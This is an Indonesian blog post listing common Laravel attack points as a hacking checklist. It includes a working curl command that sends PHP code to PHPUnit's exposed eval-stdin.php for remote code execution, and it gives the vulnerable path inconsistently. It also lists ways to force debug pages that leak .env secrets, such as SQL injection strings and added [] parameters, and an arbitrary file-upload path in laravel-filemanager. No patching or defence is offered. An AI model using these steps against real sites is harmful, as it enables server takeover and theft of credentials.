Common Bug Pada Laravel

Sebelumnya saya berterima kasih kepada mas Ade pemilik blog

Laravel Phpunit RCE (Remote Code Execution)

Vulnerable path: /phpunit/src/Util/PHP/eval.stdin.php
Vuln Indicator: Blank Page

Exploit: curl -d “<?php echo php_uname(); ?>” http://webtarget/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php


Laravel dot env (Laravel Environment)

Impact: Sensitive Information Exposure
Vuln Indicator:

Laravel App Debug

Impact: Sensitive Information Exposure (Path,.env conf)
Cara Men-Trigger:
1.Gunakan Query/String SQL Injection pada post dan get data
2.Masukkan path /logout (
3.Menggunakan Buffer Overflow pada form/urlĀ  (ex:site/xxxxxxxxx/)
4.Menambahkan [] pada parameter yang ada (bisa post atau get)

Laravel File Manager

Impact: Arbitary File Uploads
Vulnerable path: /laravel-filemanager/

Thanks to : & Ade Little

-William Laurent

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.